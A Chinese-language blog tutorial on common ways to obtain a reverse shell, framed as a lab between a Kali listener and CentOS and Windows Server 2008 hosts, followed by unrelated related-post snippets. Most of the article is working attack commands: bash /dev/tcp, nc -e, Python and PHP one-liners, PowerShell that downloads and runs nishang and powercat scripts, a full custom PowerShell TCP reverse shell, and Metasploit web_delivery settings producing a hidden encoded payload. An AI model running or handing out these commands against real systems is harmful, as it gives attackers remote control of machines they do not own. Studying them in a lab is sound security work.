百度360必应搜狗淘宝本站头条
当前位置:网站首页 > IT技术 > 正文

铭说 | 几种常见的反弹shell方式(反弹shell的常用命令)

wptr33 2025-03-24 00:23 19 浏览

什么是反弹shell?

通常我们对一个开启了80端口的服务器进行访问时,就会建立起与服务器Web服务链接,从而获取到服务器相应的Web服务。而反弹shell是我们开启一个端口进行监听,转而让服务器主动反弹一个shell来连接我们的主机,我们再通过接收到的shell进而来远程控制服务器。

什么是Netcat?为什么选择Netcat?

Netcat由于他体积小且功能强大的特性,常常使用者被称为“瑞士军刀”或者ncat,在Debian、Mac系统中是默认安装的。想要在两台机器之间进行正向、反向连接,Netcat通常是不二之选,反弹shell的使用中常用参数包括:

  • -e filename 程序重定向
  • -l 监听接收信息
  • -n 以数字形式表示的IP地址
  • -p port 本地端口
  • -u UDP模式
  • -v 显示详细信息 (-vv能显示更加详细的消息)

关于Netcatd的更多使用方法可参考:

https://www.freebuf.com/sectool/168661.html


Linux系统中常见的反弹shell

实验环境:

Kali:192.168.178.131

CentOS 7:192.168.178.218


方法一:利用Linux命令

#反弹命令:

bash -i >/dev/tcp/192.168.178.131/23333 0>&1 2>&1

在系统文件中是不存在/dev/tcp这个文件的,它是一个特殊文件,打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理/dev/udp就是通过udp来进行传输。

#Kali进行监听:

nc -lvp 23333

方法二:利用nc命令

#反弹命令:

nc -e /bin/bash 192.168.178.131 23333

(利用了nc的重定向功能)

#Kali进行监听:

nc -lvp 23333

方法三:利用脚本

1. Python

#反弹命令:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.178.131',23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

#Kali进行监听:

nc -lvp 23333

2. php

(前提:需要在php.ini中放开危险函数system,exec。可以通过php --ini来查询php配置文件路径,然后删除配置文件中“disable_funtions”变量中对应的函数名即可。)

(1) 反弹命令(代码假设TCP连接的文件描述符为4,如果不行可以换成5或6):

php -r '$sock=fsockopen("192.168.178.131",23333);system("/bin/bash -i <&4>&4 2>&4");'

#Kali进行监听:

nc -lvp 23333

(2) 反弹命令:

php -r ‘exec(“/bin/bash -i >& /dev/tcp/192.168.178.131/23333”);’

#Kali进行监听:

nc -lvp 23333


Windows系统常见反弹命令

实验环境:

Kali:192.168.178.131

Windows server 2008:192.168.178.128


方法一:利用”nishang”攻击框架

Nishang(
https://github.com/samratashok/nishang )是一个基于PowerShell的攻击框架,集合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。

1. 利用UDP反弹命令:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.178.131 -port 23333

#Kali进行监听:

nc -lup 23333

2. 利用TCP反弹命令:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.178.131 -port 23333

#Kali进行监听:

nc -lvp 23333

方法二:利用powercat

powercat(
https://github.com/besimorhino/powercat)为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat。

#反弹命令:

powershell IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.178.131 -p 23333 -e cmd

#Kali进行监听:

nc -lvp 23333

方法三:自定义powershell函数

#反弹命令:

powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.178.131',23333);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

#Kali进行监听:

nc -lvp 23333


方法四:利用metasploit

利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell。

#以powershell进行反弹为例,kali执行命令,可以看到生成已经过编码的payload:

msfconsole

use exploit/multi/script/web_delivery

set payload windows/meterpreter/reverse_tcp

set target 2

set LPORT 23333

set LHOST 192.168.178.131

Set srvhost 0.0.0.0

Set srvpost 8080

run

#Win server 2008执行生成的命令“powershell.exe -nop -w hidden -e ......”(-w hidden参数使命令运行时窗口隐藏)。

#Kali接收到反弹:

以上提到的是常见的反弹shell方式,当然,还存在更多的其他方式,github上也有很多成熟的攻击框架可以实现反弹shell,例如PowerSploit、Empire、Dnscat等等,感兴趣可以继续进行深入学习。

相关推荐

redis的八种使用场景

前言:redis是我们工作开发中,经常要打交道的,下面对redis的使用场景做总结介绍也是对redis举报的功能做梳理。缓存Redis最常见的用途是作为缓存,用于加速应用程序的响应速度。...

基于Redis的3种分布式ID生成策略

在分布式系统设计中,全局唯一ID是一个基础而关键的组件。随着业务规模扩大和系统架构向微服务演进,传统的单机自增ID已无法满足需求。高并发、高可用的分布式ID生成方案成为构建可靠分布式系统的必要条件。R...

基于OpenWrt系统路由器的模式切换与网页设计

摘要:目前商用WiFi路由器已应用到多个领域,商家通过给用户提供一个稳定免费WiFi热点达到吸引客户、提升服务的目标。传统路由器自带的Luci界面提供了工厂模式的Web界面,用户可通过该界面配置路...

这篇文章教你看明白 nginx-ingress 控制器

主机nginx一般nginx做主机反向代理(网关)有以下配置...

如何用redis实现注册中心

一句话总结使用Redis实现注册中心:服务注册...

爱可可老师24小时热门分享(2020.5.10)

No1.看自己以前写的代码是种什么体验?No2.DooM-chip!国外网友SylvainLefebvre自制的无CPU、无操作码、无指令计数器...No3.我认为CS学位可以更好,如...

Apportable:拯救程序员,IOS一秒变安卓

摘要:还在为了跨平台使用cocos2d-x吗,拯救objc程序员的奇葩来了,ApportableSDK:FreeAndroidsupportforcocos2d-iPhone。App...

JAVA实现超买超卖方案汇总,那个最适合你,一篇文章彻底讲透

以下是几种Java实现超买超卖问题的核心解决方案及代码示例,针对高并发场景下的库存扣减问题:方案一:Redis原子操作+Lua脚本(推荐)//使用Redis+Lua保证原子性publicbo...

3月26日更新 快速施法自动施法可独立设置

2016年3月26日DOTA2有一个79.6MB的更新主要是针对自动施法和快速施法的调整本来内容不多不少朋友都有自动施法和快速施法的困扰英文更新日志一些视觉BUG修复就不翻译了主要翻译自动施...

Redis 是如何提供服务的

在刚刚接触Redis的时候,最想要知道的是一个’setnameJhon’命令到达Redis服务器的时候,它是如何返回’OK’的?里面命令处理的流程如何,具体细节怎么样?你一定有问过自己...

lua _G、_VERSION使用

到这里我们已经把lua基础库中的函数介绍完了,除了函数外基础库中还有两个常量,一个是_G,另一个是_VERSION。_G是基础库本身,指向自己,这个变量很有意思,可以无限引用自己,最后得到的还是自己,...

China&#39;s top diplomat to chair third China-Pacific Island countries foreign ministers&#39; meeting

BEIJING,May21(Xinhua)--ChineseForeignMinisterWangYi,alsoamemberofthePoliticalBureau...

移动工作交流工具Lua推出Insights数据分析产品

Lua是一个适用于各种职业人士的移动交流平台,它在今天推出了一项叫做Insights的全新功能。Insights是一个数据平台,客户可以在上面实时看到员工之间的交流情况,并分析这些情况对公司发展的影响...

Redis 7新武器:用Redis Stack实现向量搜索的极限压测

当传统关系型数据库还在为向量相似度搜索的性能挣扎时,Redis7的RedisStack...

Nginx/OpenResty详解,Nginx Lua编程,重定向与内部子请求

重定向与内部子请求Nginx的rewrite指令不仅可以在Nginx内部的server、location之间进行跳转,还可以进行外部链接的重定向。通过ngx_lua模块的Lua函数除了能实现Nginx...